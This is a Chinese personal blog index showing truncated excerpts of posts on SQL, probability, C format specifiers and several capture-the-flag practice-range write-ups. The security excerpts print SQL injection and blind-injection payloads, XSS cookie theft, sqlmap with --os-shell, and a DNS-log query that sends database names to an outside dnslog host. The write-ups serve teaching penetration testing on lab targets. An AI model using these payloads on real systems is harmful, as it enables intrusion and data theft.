sparename的博客

计算机组成原理理解位运算符

select 列名/聚合函数 from 表 where 条件 group by select后的列名 having组内条件select 执行group by 分的组数次 先分组，再查询 连接查询 (多表查询)select 列名 from 表 where 条件 and 表连接(单表查询)select 列名 from 表 inter(可省) join 表 on 表连接 where 条件自连接(自己跟自己的表连接)嵌套查询(子查询)大部分查询可以用连接查询，聚合函数和否定查询必须用子查询相关子查询。 exi

为什么要写博客，如何写博客

概率论复习第一章 随机事件及其概率1.1 随机试验、样本空间知道随机试验为E，样本空间为S就行1.2 随机事件事件中的关系区分三个:互不相容/互斥、对立事件、独立事件记住三个公式：P(AˉBˉ)=P(A∩Bˉ)=1−P(A∪B)P(\bar{A}\bar{B})=P(\bar{A\cap B}) =1-P(A\cup B)P(AˉBˉ)=P(A∩Bˉ)=1−P(A∪B)P(ABˉ)=P(A−B)=P(A)−P(AB)P(A\bar{B})=P(A-B)=P(A)-P(AB)P(ABˉ

转换说明及作为结果的打印输出％a 浮点数、十六进制数字和p-记数法（C99）%A 浮点数、十六进制数字和p-记法（C99）%c 一个字符%d 有符号十进制整数%e 浮点数、e-记数法%E 浮点数、E-记数法%f 浮点数、十进制记数法%g 根据数值不同自动选择％f或％e．%G 根据数值不同自动选择％f或％e.%i 有符号十进制数（与％d相同）%o 无符号八进制整数%p 指针%s 字符串%u 无符号十进制整数%x

尤里的复仇II 归来sqlmap尝鲜题sql-注入绕过防护getshellsqlmap尝鲜题Tips:在修练的过程中，尤里发现在这个领域有很多的神器，只要获得这些神器，就可以让测试更加轻松……很简单的啦，一跑就出来啦传送门sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --os-shell//控制目标服务器sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=c

尤里的复仇II 回归渗透第一步-信息收集 1渗透第一步-信息收集 2渗透第一步-信息收集 1Tips:信息收集作为渗透测试的第一步，能决定后续测试的走向，甚至能直接找到目标的漏洞，那么如何才能在繁杂的网络世界里找到所需的数据呢？尤里开始了努力……最终他找到了目标的……成功掌握了这一技能基础目录扫描 传送门题解：非常简单的目录扫描直接用御剑扫描不过flag在二级目录里flag_{oh!you_find_it!}渗透第一步-信息收集 2Tips:经过上次的事件，尤里

尤里的复仇II 回归归来-脚踏实地二级目录三级目录归来-脚踏实地进入页面，首先验证一下是不是cms模板指纹验证：链接在线cms指纹识别当然也可以使用插件Wappalyzer来识别得出此站为JoomlaCMS，去网上查下Joomla漏洞，发现他有很多版本，但不知道是什么版本，那怎么查版本呢，注意cms有文件，文件里面写明了版本号，所以我们只要找到写明cms版本的文件就可以了，但这个文件在哪，文件名我们并不知道，我们怎么找呢，很简单，因为cms模板里面内容可能会改，用cms建站文件名一般不会

尤里的复仇Ⅰ 小芳！第三章：为了更多的权限！留言板！判断是否为xss跨站脚本攻击查看cookie利用xss平台flag就在cookie里面第四章：进阶！拿到Web最高权限！修改为管理员cookie后请直接访问管理页面 准备好了吗？第五章：SYSTEM！POWER！第六章：GET THE PASS！第三章：为了更多的权限！留言板！判断是否为xss跨站脚本攻击<script>alert(111)</script>查看cookie<script>alert

尤里的复仇Ⅰ 小芳！第一章：为了女神小芳！第二章：遇到阻难！绕过WAF过滤！测试是否有注入点，弹框提示过滤了很多关键字绕过WAF关键字过滤第一章：为了女神小芳！SQL注入，判断字段数，判断回显点这道题可以用exists函数猜测表单and exists(select * from admin)#猜测有admin表单http://59.63.200.79:8003/?id=1%20and%20exists(select%20*%20from%20admin)继续猜是否有user，password

漏洞组合利用靶场DNS_log注入二级目录三级目录DNS_log注入and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.02qrm4.dnslog.cn/abc')))1 and (select load_file('//',(concat(select database()),'.xizusd.

封神台-掌控安全在线演练靶场SQL注入实战靶场【4题】SQL注入实战靶场——基础靶场1SQL注入实战靶场——基础靶场2SQL注入实战靶场——基础靶场3SQL注入实战靶场——基础靶场4盲注 - 没有回显情况下SQL注入【3题】SQL盲注——靶场1SQL盲注——靶场2SQL盲注——靶场3HEAD注入 - 另类传参方式SQL注入【3题】HEAD注入 ——靶场1HEAD注入 ——靶场2HEAD注入 ——靶场3SQL注入实战靶场【4题】SQL注入实战靶场——基础靶场1and 1=2order by 3

盲注-没有回显情况下SQLSQL盲注——靶场ASQL盲注——靶场A三级目录SQL盲注——靶场A1.判断数据库长度：and length(database())>4 122 .数据库名称：and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107用burp进行爆破：开服务器，用本机的私网，注意变量的添加 107 97 110 119 111 108 111 110 103 120 105 97 kanwolongx

SQL注入实战靶场SQL注入实战靶场-基础靶场1SQL注入实战靶场-基础靶场11. 判断是否存在SQL注入：and 1=2 2. 判断字段数：order by 3 3. 判断回显点：and 1=2 union select 1,2,34. 查询数据库：and 1=2 union select 1,database(),35.查询表名：and 1=2 union select 1,table_name,3 from information_schema.tables where table_s